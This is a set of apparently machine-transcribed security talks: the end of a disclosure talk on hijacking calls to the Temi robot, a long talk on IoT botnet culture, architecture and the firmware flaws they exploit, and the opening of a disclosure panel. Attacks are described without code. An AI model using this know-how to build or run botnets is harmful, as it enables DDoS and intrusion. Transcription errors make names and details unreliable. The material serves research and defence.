of battery so that attack vector leveraged that last vulnerability described which gives us owner privileges let's look at how we can exploit the previous vulnerability which had to do with intercepting calls so first we'll begin by starting a call from the Temi for its admin and as normal you know all as well as the world the admin gets the call but the attacker doesn't this is expected behavior but from the hack-dap of a simple button press we can change this entirely by subscribing to the admins call invite topic now when the Temi calls it again both the attacker and the admin will receive the call and the attacker is free to pick up this call and gain the same control over the robot it did with the other attack vector all right that includes the demo got a couple slides to finish off so let's talk about the vendors response to our research so we disclosed all four vulnerabilities to Robotemmy global LTD on March 5th they responded very quickly and they were very receptive to all the suggested mitigations for these vulnerabilities that we outlined in a report but perhaps most importantly they maintain constant communication throughout the process of working with us to mitigate the vulnerabilities speaking of which all four CVEs are actually patched as of July 15th and McAfee ATR my team has reviewed the patches and has confirmed that they have they successfully mitigate all four CVEs now all code shown as a result is from the older vulnerable versions of the the APKs in fact the code is now heavily obfuscated and much harder to parse and this is sort of what the gold standard we seek out in security researcher and vendor relationships where it's a mutually beneficial thing where the vendor responds quickly and we're able to get these things patched as soon as possible ultimately resulting in a safer product for everyone now before I let you guys go I do want to discuss really briefly the various impact scenarios you might see these used for these vulnerabilities I think the biggest one is healthcare there's obvious privacy concerns whenever you know spy on a potential medical appointment or anything to do with health information that's why it hit us such a big deal but another potential attack vector might be you know using it as a sort of espionage for getting the status or location of persons of interest within a hospital that might be something a nation-state actor might be interested in another attack scenario I want to have you guys think about is the enterprise one so we've already seen that these robots are being used in corporate offices now you know this actually would grant an attacker access to certain information that simply isn't accessible from a network based attack scenario things like you know information posted on bulletin boards on post-its on computers I hope it wouldn't be a password but who knows network diagrams and whiteboards and other sensitive information and perhaps more obviously the ability to spy on boardroom meetings what kind of a sensitive information or trade secrets could could be listened through and it is not too surprising to see a teleconference robot being used in a room for teleconferencing and if that said that concludes my talk I will be a present in the discord server to answer any questions you guys have and thanks for tuning in
Once limited to the realm of science fiction, robotics now plays a vital role in many industries, including manufacturing, agriculture, and even medicine. Despite this, the kind of robot that interfaces with people directly - outside of the occasional toy or vacuum - threatens to remain an inhabitant of fiction for the foreseeable future. Teleconference robots, a rapidly growing niche, may help make that fiction a reality. Robots such as these have found use in consumer, enterprise, retail, and even medical environments and some are even capable of autonomous movement. It’s precisely these features, however, that make them a valuable target for hackers. Unlike a simple camera exploit, compromising such a device would grant an attacker mobility in addition to audio/video, greatly increasing their ability to spy on victims in the most private of situations - their homes, medical appointments, or workplaces. Not knowing when to quit, McAfee Advanced Threat Research uncovered four 0-day vulnerabilities in a popular teleconference robot. We’ll show how an attacker armed with nothing besides the victim’s phone number could exploit these vulnerabilities to intercept or join an existing call, gain access to the robot’s camera and microphone, and even achieve “owner” privileges, granting the ability to remotely control the robot - all with zero authentication. Bio: Mark Bereza is a security researcher and new addition to McAfee's Advanced Threat Research team. A recent alumnus of Oregon State's Computer Science systems program, Mark's work has focused primarily on vulnerability discovery and exploit development for embedded systems. Mark previously presented at DEFCON 27, less than 6 months after graduating college.
10.5446/50731 (DOI)
I got Buddhist connected to my botanist. Got hella Buddhist, hella Buddhist, Buddhist, hella Buddhist, Buddhist, I got Buddhist connected to my botanist. Hanging out on hack forums, best believe I got warrants, telling all who listened at my botanist, not boring. Modified Mariah and I'm mixing in the miner, comes as no surprise, getting wrecked by a miner. Cover up his drop bear, looking for me everywhere, know I'm really not there. Places I will not share, drop a couple backups, I know you won't find me. Buy a couple more smart balls, won't you kindly? Screen him Captain Phillips, who the hell are you? Wonder why your toasters connected to, are you? Why your toasters toastin', I'm using it for roastin', some kid got busy boastin'. Now his mode on smoking, keep the crypto flowin', I need my money now. But I gotta go, cause my mom's studying now, I'm callin' all the shots and it's time for me to score. I got a couple spots, hit me up on Discord. Botnet, I got hella booters, botnet, take over your rooters, botnet, in your internet of things, botnet, man the shit hella stinks, botnet, I got hella booters, botnet, take over your rooters, botnet, in your internet of things, botnet, man the shit hella stinks, botnet, I got hella booters, botnet, take over your rooters, botnet, in your internet of things, botnet, man the shit hella stinks. Well that was amazing. Well thanks so much Dave, for that amazing intro. I was not really sure what to think when I just got a PM saying that there was a theme song for my talk. So hi everybody, thanks for coming and hangin' out. Hold on, I'm thinking, sure everybody can hear me right? I'll chat, you can hear me? Say hi if you can, just thinking sure, got a terrible microphone. Alright cool, cool. Okay, so let's get it goin'. So yeah, it was my talk. I'll just get right into it. So who am I? I'm Ned Spooky, Senior Reverse Engineer at Redacted Company. I primarily work on embedded devices, firmware, industrial control systems, and taking apart proprietary network protocols. You know me online as either Ned Spooky or you. And I contribute OSS tooling and other errata for ThirtIntel, RE and offensive security. So, alright, we'll still do a little background on this, so why do this talk? So I know that there's a lot of people that have seen IoT botnets, whether it be how you've been affected by it, or Steve people talking about them online. And I had done a bit of my own research and I really kind of wanted to add a bit of perspective from my end on this. Because IoT botnets are definitely still incredibly prevalent. We are all affected by them, whether we like it or not. You know, if your work slack is suddenly down because of somebody's fight on Xbox Live or Minecraft, you know, this is affecting you in some way. But I don't think a lot of people take them as seriously. A lot of people think it's like, you know, kiddie stuff, like script kiddie stuff, which is unfortunate because it definitely is something that is, you know, an issue that we all have to deal with. And so, I spent a good amount of time collecting malware sources. So I started doing this in about 2018. And I had been collecting and developing tools to analyze source code and analyze binaries, which I'll get into later. I study a lot of the commonly exploitative vulnerabilities and wanted to know more about why they were so prevalent. Like why can you have 4 million hacked routers on your botnet? It's insane to me. So I wanted to inform others about the impact of their technology choices, specifically firmware devs and people who are also end consumers. And I also wanted to propose some ideas for how to address these. And so I also, this talk, I should have given it a bit, I said about a year ago or so. It's just kind of been pushing on the back burner a bit, but I tried to update it as much as I could. And I also had to kind of cut out some of the parts which I'll talk about as I go through the talk. So here's the outline real quick. So we're going to go over IOT botnet history. We're going to go over the actual botnet scene a little bit. Talk about the architecture of botnets and how they spread and propagate. And then we're going to talk about the firmware vulnerabilities that enable them and steps to move forward for vendors. So starting off just with IOT botnet history. So what is an IOT botnet? So if you're here watching for IOT Village, you probably are aware of IOT issues and botnets in general. But for those who haven't seen anything about them, they're basically a network of hacked IOT devices that are basically internet connected devices like routers, set up boxes, webcams, your toaster. This little toaster on here has a little script on how to scrape Shodan for Linksys routers. So they're used primarily for DDoS and they're sometimes used for crypto mining and also tunneling and proxy and traffic. And so for this thing, I'm going to this talk is kind of more of a cultural that is technical and I kind of want to be able to kind of go through a lot of the confusing nomenclature that surrounds this because there's a ton of it. People call botnets by a million different names, whether you're talking to a researcher or talking to a person who develops them. There are a ton of different types. So it's going to go through a little bit of the history here. So IOT botnets, as they're known right now, can be traced back to I guess 2014-ish when Lizard Squad came out with the, I guess, the botnet malware with the most names like any malware. It's been termed a bash light. It can also be called Lullbot, Torless, Lizkabob, Lizard, Streets, or Ballpit, Gaffigate and just a bajillion other names. And so it was spread by exploiting shell shock vulnerabilities and shell shock came out and busybox on a bunch of different devices. So there was people were, you know, scanning the entire internet for shell shock vulnerabilities because they were all over the place, but they were very, very common in a lot of IOT devices. And so when this was actually happening, though, there were actually a lot of different botnets, there are bots that were being distributed because there hadn't been as many sources as there are now. So you've heard of Kytan, which is like an IRC, C2 based botnet that was spread a lot, as well as like just Perl bots that are just literally DDoS bots that are written in Perl. So the source code for this was leaked in 2015 and a lot of people started to work on it. And so collectively, it's hard to choose one name for them, but collectively I would say that these would be categorized as Cubot, which is unrelated again to the KAC bot malware, which people call Cubot. And so, yeah, new devices that are still vulnerable to this exact same vulnerability appear online, like newly to this day. And so fast forward a couple of years. So Mira came out in 2016. And so it was used in some famous DDoS attacks like the Dyn DDoS attacks, the ones on Brian Krebs and some other people. But it was leaked shortly after some of the bigger DDoS attacks happened. And people started to immediately use it because it was a lot more streamlined than the previous versions of DDoS malware. A lot of the stuff was in really simple one file bots and servers, very, very basic stuff over telnet. So Mira, it was a lot more streamlined. It was very modular. So there's different files that made it easier for you to plug in new exploits into and also made it easier for you to have access control for users. That were coming on. And so it also had a bit better code. It was definitely still not the best, but it's a lot better than the previous code for Liskabob and Lowesbot. So I also had a SQL server on there, which made it running the server a lot easier for them. And so it seems like everybody has a botnet fork these days since then. So there's other IOT botnests that are pretty major that have come out. A big one that you may have heard of was Satori or FBot or Okiro. And it's a pretty well-known Mira I fork that's a bit different from some of the other ones because a lot of them are kind of just very copy pasted, stack overflow questions, fit into some Golang and C code. But so this one here had a bit, the person who was doing it definitely knew what they were doing a bit more than most people. And that person actually just went to jail recently. We've also seen Brickerbot, which is the botnet that would just basically infect and break IOT devices. And there's been a few iterations of it. There was a one in 2017, and then there was one recently, I think it was like a 13-year-old kit or something like that that did it as well. A newer one, really interesting is Kaiji, Golang-based, cross-compiled SSH rootforcer, and it actually installs a rootkit or tries to establish persistence. It is really interesting. I'll get into that more later. Access R is another one that I've seen. I just threw in there because I didn't hear anybody talking about that one, but it's more modular, still crappy. Then you have there is Bitcoin miner botnets that you may have seen. It's harder to do Bitcoin mining on an IOT device because they don't have as much CPU power and no GPU, but they're still out there. And then I also did a write-up on some Mira I variants that are targeting FPGAs and some really exotic architectures, which I have a link in the citations at the end here, or you can go on my website and see it. So yeah, botnet activity growth, I mean, like similarly to QBOT, Mira just started popping up all over the place once it was leaked, and there became basically a huge marketplace for people who are trying to sell spots on the botnet, right? There was reseller markets, affiliate programs and incentives for having it grow, and also booting itself, and de-dossing somebody, their home router became a really common thing for people to actually try and do because it's just like a way to knock people off line, especially if they're mad at them and call it duty or something. And so yeah, it's basically just like the thing that people start to do. And so like, you know, though, as these things develop and grow, like a thousand monkeys at a thousand terminals will eventually take out the internet, and that's kind of what's been happening. And so we'll get a little bit into the scene here. So the botnet scene at a glance, there's entire communities that are dedicated specifically to just one botnet or one botnet group, and they are usually talking on Discord, sometimes they're on forums or IRC. At least we definitely more IRC back in the day when people would have C2s connected to IRC, but nowadays it's more Discord or people are talking. Advertising is done on literally every single social media platform you can think of. I think somebody found Pinterest that had somebody advertising botnets, but yeah, if you go on Instagram and just literally search botnet or Qbot or botnet setup or YouTube, you will find somebody advertising their latest slammin' botnet. And so Booter Time is generally sold, people for DDoS or through a web panel, or through a tele-net interface, but that's the main thing that people are trying to do is just sell time on the botnet. And so you'll see here on the bottom, it might be a little small for some of you, but there's just some advertisements for different botnets, and also some videos on how to boot people offline and how to do it using just an Android. Best Booters 2020, these all have hundreds of thousands of views too, so these are people that are really going hard with the advertising. So the sources, so I talked about the sources that have kind of been modified to people. They're usually distributed as zips or rawers or whatever, and they are sold for about $500 to $300 USD from just what I've seen. So the authors typically change very little of the codebase, usually just involves something simple, just changing the ASCII art, or changing the variable names, something like Ctrl F and replace. And sometimes they might even add a new exploit, which is always interesting, but exploits themselves to load bots are sometimes sold, but a lot of them are literally, like you can Google any part of the script and you will find the exploitDB link where they took it from. The ones that are sold though from exploitDB or metasploit modules are usually backdoor'd, and it's really funny they just have a base64 blob that just like runs, like import OS and then just run this, import sys and run this or whatever. And so when I was going through and finding a lot of these sources though, I would find that when people would scan each other or rip off somebody, or somebody you had a fight with them, they would leak each other's source code, which is great for threat intel people and reverse engineers who want to figure out what's going on, because they would just be like, oh, hey, here's this person, here's everything they've done, here's their botnet, and here's their code, and you can just kind of scoop it up and take a look at it. And so selling spots, Prime Minister's revenue, as I said, they're typically sold in weekly, monthly, or lifetime plans. You can see a breakdown of plans over here. Pretty cheap too. The lifetime is always really funny to me because it really just means for the duration of the bot's lifetime, and sometimes that does not last longer than the three days or a month, depending on how bad their operation is. So more enterprising people, people who are a bit more advanced might use a web stressor, and they can sell access to that with users and everything for a web browser. There's been a few big web stressors that have been taken down, and some of them are still up. Web stressor source leaked, volums in the web stressor, there's so much surrounding that it adds a bit of abstraction to it that makes it harder to manage. And then, yeah, finally, some people act as resellers, and they get a cut of the sales over time. So who runs a botnet? IoT botnet operators, based on what I've seen in the scene, I guess, they're usually pretty young, high school age, sometimes college age. They're somewhat experienced with computers, but they're usually not developers. They learn a lot through YouTube and through text files, which I have a collection of them in the GitHub that I'll explain in a little bit, which are just tutorials on how to set them up, basically how to spin up a rail box, and how to actually hold on one second. So that's actually what it's called, just do the basic things that compile with GCC. A lot of the times, though, they really have no clue what they're doing. So you'll see people who are trying to get support for different botnets, and they're really confused about GCC or what access control is. But more sophisticated people might have a web stressor or an API, like I said before. They'll use cryptocurrency instead of PayPal, which is very common for some reason. You can tie it to your bank directly. In some cases, people will also use botnets for additional purposes, like proxying traffic. So sometimes you'll see fly-by-night VPN operations that might be doing something shady, like routing their traffic through routers, and that's just their VPN somehow. So why run an IoT botnet? Just as much as most malware is, there's a lot of the similar reasons, but there's a lot of stuff that comes with the fact that there's a lot of younger kids involved in this. So they usually do it for either money, because people can earn money from the sale of botnet spots. A lot of people do this for attention. People seek attention for stuff, even if it's not even a DDoS, and it's just like a regular production outage. Some people might say, oh, yeah, my group, we DDoS these people, and we're going to extort them for money, and then you look at their status pages, like, oh, yeah, sorry, we had a blip in updating this thing, and we're back now, which is always awesome. So fly-in demand is definitely people who want to DDoS each other, and so that's definitely wanting to meet that demand is something that is good for any young entrepreneur. Revenge is also big. I see a lot of people claiming that somebody docks them or DDoS them, and they want to get back at them by getting their IP and booting them offline, and then people are also inspired a lot by pass attacks, because people have seen what actually happens if somebody DDoS doesn't takes out the internet, they want to be doing that. And also, it's incredibly easy to set up an IoT botnet. So let's take a little bit of time to go over the architecture of DDoS botnets. So as I said before, earlier botnets used standalone bot files and C2 files that were just compiled with GCC or UCLib C for cross-compiling. They were very, very simple to set up and deploy. Some of them for C2 itself, they used IRC for command and control, and they'd have IRC, like, very bare bones IRC clients connected to their, within their bots. But we or I modernized it, and they have actually a CT protocol that is used, and they have like a SQL backend for tracking bots and all that. So Web Stressors will use PHP and some other, I guess, API stuff for managing the bots, but it's definitely evolved a lot more than it used to be like five years ago, which is interesting to see. So the life cycle of a botnet is usually very, very short. You don't see them for very long. Not going to be over a month or two. Basically, somebody will set up a C2 on like a lax VPS host, they'll scan for their own devices, they'll get some bots to their botnet, they'll advertise their spots and then use it. And then the takedown goes one of two ways. Either somebody like, Save Bad Package Report will tweet out their botnet to the, and tag the web stressor, I mean, the web host, sorry, and somebody will notice it and get it taken down, or somebody else's botnet will start kicking their bots from the system, and they won't be able to keep up and they'll lose power. But then it'll just keep happening again. This is just the same thing you see over and over again. Hold on one moment. Okay, that's cool. I didn't take a sip of water. So this inevitably leads to a King of the Hill game for botnets. They're very territorial, people are targeting one specific type of device with one specific vulnerability, but they've coded into their variant. And then when somebody else gets the same idea, they'll start attacking and doing things like that, getting their bots on there. Anybody who touches the device usually already has root access, but they might have either like some weird file system, or there's no way to really reconfigure it, or they might not know how to reconfigure the device to kick everybody else out. But basically every bot will only last as long as it can before somebody else takes its place. And also there's really no repercussions for this, so everyone's just kind of slamming on different IoT devices. And picture it as an IoT operator, or botnet operator watching their bot count drop. So evasion is definitely an interesting aspect of this. So there's a lot of very simplistic evasion that you'll see here. This one up at the top here is somebody just renaming their process to Drop Bear, which is, I guess, it works, but it's also used by everybody, so then everybody will just kill the Drop Bear process once they log on. But realistically, this is not to hide from any sort of firewall, or any sort of AV or anything. It's only really used to evade other botnet operators. And so those new things like the process masking, they might learn about a different area of the file system that they can put a bot in. They might hide a backup bot and have potentially something like a cron job. It's always very, very primitive and very, very bespoke. And I actually had a whole code review section that could have actually been an entire talk, but I had to cut it for time here. But there's a lot of very strange ways that people will try to do evasion, which I would love to talk about at another date. And so bot killing, as I said before, people will do this. You'll take a look at this, if you can see it on the side here. Here's an array that's just full of a ton of different bot names. And every time they update this botnet, which I have multiple versions of it, they would add more and more of these. But you'll see they'll do things like iterate from one to however many. Shoulda killed every process, it's called that. Or every single version of this specific Jack by Nips or whatever, Two-Face. So people will be aware of different botnets that are operating and what they name them, and then put them into their scripts. And it's like a cat and mouse game, because nobody can fit everything in there. Otherwise, their binary is going to be full of strings that ultimately are going to get detected by people who are reverse engineering the malware. And so, not some, not most, nearly all bots as he twos, I would say all, have really, really silly vulnerabilities that make them incredibly easy to knock off line. And I don't really see too many of these techniques really utilized or advertised by people, but in my next slide, I'll show you something interesting, I guess. So here's my non-live demo for a C2 killer. So this is something that I found, I definitely was not the first person to find this, but it was part of my testing when I was testing out these different things when I was researching. It's incredibly easy to kill, you know, mirror eye C2s. This is a, you know, take your screenshots or whatever. I already put this out on Twitter at some point. But yeah, this is, if you send this to either the admin port or to the heartbeat protocol port, it just segfalls the mirror eye C2. And I've never seen anybody fix this. This is in every version of mirror eye that I've seen. Some people have had claimed that it was fixed, but I still, after reviewing every single one of them, that I could find, I've never seen that. And so, I'll take a bit of a second, the last little bit on the bonnet scene here. You know, when I was going through and doing this work, I ended up creating a tool to help me track all this stuff. And I put it out on GitHub. It hasn't been updated for a bit because I've gotten too many other projects to do, but it's a static analysis and classification tool for zip files and binaries and things like that. It just feeds it all into a big elastic search database. I definitely, I'm taking the next week off of work, so I'm going to take some time to push my big update to this. But if you want to check it out, definitely do it. I have some new things in API, different symbol hashes and key extraction techniques in there. But it was just mainly for me for fast analysis because I was, you know, I had, it's basically feeding in either new source code or new bot binaries into this and just tracking them. But it works for other malware too. Also, if you want to, I had a Twitter that was deleted by Twitter for some reason that was called Threatland, but that was the name of the project that I used to track all these sources. So I have like every Mirai and Qbot and other botnet, just even beyond IoT, I tracked them all in a big repo called TLBots and have a few other repos. If you want to check them out for like fraud tools and stuff. But yeah, there's literally clone that is like a gigabyte worth of zip files of every malware source code that I could find. Yeah. So now we're going to get into talking about vulnerabilities and this is kind of this, this aspect of it is a bit more about like stuff for devs, because I wanted to be able to give info for developers who are working on a few devices to take all of what I just said there and put it into context for their actual security architecture. So let me take another sip of water. Okay, so we're here, we're peering into the void here. So here is, if you ever have gone on green noise, they have a lot of tags for different either vulnerabilities themselves, of the people are scanning for, or just classes of, you know, malicious traffic. If you do a search just for Mirai, you'll see here, it's very, very tiny with there's there's four and a half million results for unique devices that have been scanning with Mirai like traffic. So that gives you a rough example of how many people are, or how many devices are actually infected and actively scanning. And then the other one is a show damn search for this hacked router help SOS had to password thing which there are still, I think that that hack happened like four years ago, and there's still 6500 devices that have been hacked and have this hostname. So it's always heartwarming to see, I guess. So what types of bones are exploited by these botnets so it's always very basic stuff here. We're talking about week off and off bypass so there's either admin admin as the credentials or there's that page that you can, you know, run OS commands on that doesn't actually need a password to be, you know, interact with. There's also command injection like shell shock and other really silly command injection stuff. There's also a lot of common exploits and specific services and libraries like the real tech up and p SDK, which had a phone that was like in everything there's so many different devices. Go ahead webs and think PHP also have phones that were in a lot of places, thousands and thousands of stuff were affected by go ahead. And so more rare though you'll see actual shellcode and binary exploits, which is always interesting to see because you know you'll have devices that, you know are using like the same base address and they can just do a shellcode exploit very very easily. But if they're not as common as, as you think, I think it might be because people don't know how to code a shellcode or how to inject shellcode like with a in C, like when they're writing their box so who knows but you'll see them in bot loaders for sure. And a lot of other vectors include previously compromised devices so like a few people sell lists of compromised devices for specific category devices, which there might. I don't actually know if there's any in my repo but I have seen a bunch of them where people are basically just passing those things around. So we're looking at the most targeted devices here so if you want to see you know what bones are most leveraged by these these botnets. I have a command table table here of basically I went through every, every source code that we could find there's like several hundred unique source codes, and these are the ones that people are using. A lot of them here don't actually have any like CVE or CPE or any vendor acknowledgement. So you can only really find them by kind of looking up what the traffic is or what the command injection attempt was on, you know, in your log files. Actually more than half of these don't have any CVE at all. With AV tech one which I think is being used in the IOT CTF right now doesn't have a CVE or anything. And it's just a blog post that you know people have written about it. And it's the same with like, you know, some of these neck year ones and neck year DGN 1000 that's a huge one that people have exploited I've never seen a CVE for. You know the HNAP, VACRON, like ZIXL stuff, even actually go ahead, WebSysm. But here these don't even SSH or Telnet brute force stuff this is like, like a lot of this stuff here like buffer overflow or like command injection and some of these aren't even being tracked by anybody. So when a new exploit comes out though, bot scanners will really just immediately start trying to load bots with like whatever PFC people have. And it's usually IOT bots and it's very annoying. So the infections spill over from that. So like these malware families are, you know, running on a super diverse array of architectures like there's every architecture you can think of is has a mirror I variant for it at this point. Because of cross compiling. But this means that this can affect other hosts that aren't IOT. And so people will try to use and they'll try to get Mirai onto things like web servers using like Drupal get in or Apache struts or, you know, CouchDB or whatever thing is running. They're going to try to do that to have that be the scanner as well. So these sort of infections spill over is really common and you'll see sometimes like IOT botnets are using Drupal get in and you're like what router is running Drupal. It's because they're trying to get onto everything. And so why are these devices so easy to exploit. And so we've talked we're talking about this in the last talk here about, you know, supply chain issues and so there's it's very difficult to validate supply chain is a big one. There's vulnerable software and libraries that people use. They might not be able to change or have the people to even, you know, make the changes for it. Easy to guess default passwords is a huge one devices by default doing port forwarding listening on the internet. Giant list of bone devices are passed around which makes it even easier for people who don't know what they're doing to just start exploiting. And then it all comes down to insufficient or non-existent security practices and development. And so we're going to get a little bit into firmware bones now and security practices. So you'll see there was a awesome talk I think two years ago, Schmoochon about firmware bones by CITL. And so there's a lot of stuff like vendor security practices on a binary level are like they're almost non-existent. And there's even regression analysis to show that firmware is actually becoming worse and having more vulnerabilities introduced them in a 15 year data set, which is insane to me. So you see here here's like every vendor that they had looked at. And you see anything that's closer to the edge here is going to have more of these things like stack guards or non executable stack or railroad ASLR things that are closer to the edge are scoring higher. And actually that means that more binaries have these mitigations in place. But if you can see there's very, very few that actually have anything on the graph. And then the ones that do they only have like one or two and there's very few. It's kind of sad. You want this whole all these things to be blue all the way blue and there's like lines of blue, which is really disheartening here. And so why is firmware so difficult to maintain. So there's so many reasons for it. And I used to have done firmware development before for embedded devices. And you know, even what I love the experience that I had doing that is still, you know, I could see all the echoes of this throughout the process right because rearchitecting cost is is a huge thing. Cost is usually the biggest factor for you know why things aren't changing. But you can also be locked into a vendor contract, you can be locked into like a middleware contract and you can only use drivers for this one, you know, piece of your of your kit. And you have to use it for a certain period of time. You might have unsupported chips or hardware to work with. Another huge thing is outdated tool chains you might be using some tool chains from like 2005. And that's how you build everything in 2020. There's also a lot of things like hardware restraints, which, you know, sometimes you might not like your hardware itself might not support like the SSL version that you need to that was an issue that I've had to deal with in trying to figure out how you can, you know, Jerry rig and new SSL and Christian scheme and support newer versions of TLS in firmware that's, you know, 15 years old. Sometimes you also need to maintain backwards compatibility, which is a big thing to make the stuff really it makes it very, very hard you have to include stuff that you might not want to. A lot of stuff though is is a lack of dependable updates for for users to update their devices. So even if you have, you know, all the other things in place here. It's sometimes people don't have like a way to actually update the devices without some complicated process. Poor communication channels even tell people about vulnerabilities is also a big thing. And vendors might not have any sort of like channels for reporting bugs or telling people about bugs as well. And then, you know, lack of modern security measures, like secure boot or binary hardening we talked about before, the code signing are not going to really be in place and it's hard to get those things back into your pipeline if you have to do a bunch of testing and you only have a couple people working on the thing. And so, why do we see a lot of this older stuff working so there's some sometimes you'll actually see Q bots or kite and bots or even pro bots trying to exploit stuff in your logs and you know if you download binary. And it's because the vulnerabilities are still there. Right. And so this is something that I had actually distilled analysis analogy from mud right in mining. There's indicator minerals that can prove that there are other things that you might be there. And so the, it's called the security vulnerabilities that we're seeing are showing that there are not as many security practices that are being followed, which means that the older vulnerabilities are still going to be able to work right so like we're seeing like, you know, there's still command injection here in 2020, and then you can still run a Q bot or a pro bot on this device. This means that there's really not anything that's going into the actual process of making the binary devices any, any more than that. And what's interesting is this is rare in other classes of malware like safe for desktop computers, because there's no patch really that you can apply to one specific device or whatever. So each time that there's a new volume that comes out, there's all these new devices that are added to the pool, but there's still all the routers from 2014 that have shell shock vulnerabilities in them, and DVR is still have off bypass in them. And those are all just getting added to the pool. So people are just trying the same old techniques and they're still getting the actual devices that they would have exploded before. So it's kind of, kind of frustrating. So moving forward, this is the big thing for vendors and people who are developers of firmware and embedded devices. So what can we actually do to solve any of these problems here. So we can only really fix them by having better development practices for security by meeting the developers and the vendors where they're at. Because we want them to be on top of their game and actually doing the work that we'd like them to put in so that our toaster isn't de-dossing somebody because of some mirror IV variant from this run by like a 14 year old kid. So we have to like actually talk to them, talk to vendors, the way that they, things that they already know, and in their, the way that they're already developing things. So for vendors, I guess my big advice here is to invest in developer training and to establish best practices and create security testing pipelines and encourage researchers to actually find bones and disclose them properly. We can mitigate some of the existing problems by encouraging safer use IoT devices, but it only works so much because imagine trying to explain to your parents how to, you know, turn off port forwarding on their, on their router, right, like they're not really going to understand it in the way that you might, I mean, they might, but they, you know, it's sometimes hard to get end users to actually follow your guidelines at all. They might not even be able to, to be aware of it. But that's one specific way that we can mitigate that. Establishing best practices though is a thing I wanted to highlight for a second here. So like auditing your development cycle itself. It definitely depends on what you're building and you have to tailor it to that and be able to audit and say, Hey, yeah, we are using C. We are using, you know, this tool chain, we're using your GCC or, you know, UCLib C or whatever to, you know, develop our firmware. So there are, there are best practices for these things. So, OOSP, something that I had, when I was doing firmware stuff, I had made developers, I had them look at these, some of these cheat sheets for OOSP on like tool chain hardening on like input and for, for web apps and, you know, how to do other things to know the best, the best practices that there are. And there's tons of different ones like this. I just post to OOSP because it's, it's, you know, very accessible for a lot of people and it's free. Another big thing is CIS benchmarks. You know, there's depending on what you're building, there are benchmarks for security that you can follow, which are super duper useful. You know, you can even automate that I had done like Ansible CIS benchmarks before. You can build those into tool chance pretty easily. And then also if you really need to hire a consultant to come in and do all this work with you and work through it with your team. That's definitely a huge thing for vendors. One disclosure though is probably my favorite one to talk about and the biggest one. So when you do find people that are actually poking at your stuff, allow them to disclose vulnerabilities. Please, if you are a vendor and you're listening, there are ways now it's 2020, you can have a VDP can can have a bug bounty. You have to go through the channel, the proper channels and make sure it's right for you. But there are a ton of resources disclose.io has like really good legal language and other things resources for vendors. But yeah, people who do IRT research sometimes either get no response or they get, you know, summits, you know, get sued for something. Establish security contact though and listen to emails. There's security.txt is a really easy way on your vendor website to just have a email that somebody who has an issue or vulnerability can talk to and not feel like they're trying to chase you down. Because like, how many times do you see people on Twitter, going, Hey, does anybody have a vendor contact for like this company and like, nobody responds. It's like, if we have to go on Twitter to ask about this, not only does it draw more attention to your, you know, the vulnerability, but it also makes you look bad. So definitely keep up with that stuff. Work with researchers to because people who are bringing stuff up to you, they want to help you if somebody wants to just use your device or crypto mining or you know to DDoS know some kid on Minecraft, they're not going to tell you about it. So if you have a researcher that's here and talking to you, they want to help you and you should definitely, you know, heed their advice and have some open channels with your customers to to have the word out about vulnerabilities. So you do an internal thing, or you submit the CBEs and then you post them on Twitter, whatever you do, just have some things that people can know update their devices. And ultimately, all these are elements of a vulnerability disclosure program. So if you put this all together, you have, you know, the baseline for what you need to actually have one, which is awesome. And so I done a little quick question out there on Twitter, which you can see. I have a link here. But these are some community suggestions for what vendors can do, you know, everything from automatic updates to I like the make a security in named persons problem. So like having say like, I don't know, like Sherry has to deal with the, you know, firmware bones that come in. So, you know, talk to her if there's an issue. You know, other things like minimizing attack surfaces, code signing, like all of this stuff is going to be part of other, you know, best practices that you're going to have to implement. But these are all, you know, elements of things that might be good for you to consider moving forward. Default settings definitely should be sane, and with security in mind, and also don't reinvent the wheel. So final thoughts here I got two minutes left just about. So we want to make it less easy for people to run botnets right overall. The supplies already there. The demand is great. Everything is set up. People can off the shelf, you know, get several thousand boxes on botnet in an afternoon. Bondnet authors are definitely getting a lot smarter. People are using the messy landscape of this to take control of it. Like if you see with the Kaiji botnet, which is definitely a lot more advanced than previous stuff. People are going to be using this for more nefarious purposes. And because there's so much going on in this space, it's very hard to pick out who is either a nation state trying to get, you know, access into your router, or some random kid who has no idea what they're doing. And new devices and architectures are always being targeted. As I said, FPGAs, there's tons of new stuff. You can read that analysis that I wrote. And, you know, if you don't act soon, like the new products that you put out are already going to be dead on arrival and exploitable once they come out. And so yeah, the Q&A for this is going to be done in the Defcon Discord as you might have seen in the Twitch chat. So if you have questions, or you can always hit me up on Twitter at netspooky. You know, my DMs are open there. I got some shout outs real quick. Shout out to the Safari Zone crew, which is the people that have always been there to look for weird stuff on the internet. Hopefully we'll have a zine coming out soon. Threatland, everybody who helped out with that project to collect sources. And of course, the entire community of Thug Crowd. A special shout out to Hermit for helping me go through so much of this and be such an awesome person for, you know, looking at logs and other weird stuff. Like being able to tell me a lot of interesting things that she has found. Andrew Morris, my gray noise. Thanks so much for letting me use your data set too before it's even publicly available. Thanks to Mudge for coming in hot with some hot takes from me when I was building this talk. Check out Ilya's IoT Village talk on emulating IoT devices and malware because we actually did a lot of that when I was writing this talk. And then thanks also to Dave for that theme song. So I'll have slides out. I'll tweet them out. Just follow me on Twitter and you'll see. I have citations if you want to read them. But yeah, thanks everybody.
This talk discusses the rise of IoT botnets, the culture that surrounds them, and the vulnerabilities that enable their continued existence. I will discuss various analyses of major botnet families, discuss exploits and vulnerability classes in IoT devices, and examine the rapid growth of these botnets for commercial use. I will also discuss newer innovations in IoT malware, and outline some of the ways that vendors could reduce their impact moving forward.
10.5446/50732 (DOI)
From your perspective, what does CVD mean to you? And kind of what are your motivations when you're working on an issue and you need to disclose something? So I think the main point of CVD is of course to protect users. And my main thought is a bit historical. So I've been around in the 90s where disclosure was you find a mailing list where other hackers hang out and you zero day everybody. And nobody really cares. And then became responsible disclosure, which is pretty sister for coordinated vulnerability disclosure. The problem with responsible disclosure is that it was really made to shame hackers that didn't follow the desired protocol of industry types. And the current iteration, the coordinated vulnerability disclosure is instead of trying to be coercive, trying to actually work with people that want to submit issues. And it is a much, much improved over that. And it does a much better job of making sure that everybody to a vulnerability disclosure, that means vendors, customers and hackers have their needs met. So that's what I think vulnerability disclosure, coordinated vulnerability disclosure is for me. Awesome. Daniel, another researching perspective. What do you think about coordinated vulnerability disclosure? So we are interested in understanding how things work and sometimes that involves understanding how things work that are not supposed to happen, which we then call vulnerability. And of course, then we want to figure out the truth behind it. And that involves talking to to the vendor. Very often they tell us that we got something slightly wrong. And that is an opportunity to correct these mistakes before we submit the paper or publish the paper. But also, from my perspective, it's the only ethical thing to do to protect the customers, to protect people who are using these products. And for me, I'm not in this game for finding vulnerabilities as a motivation by itself. 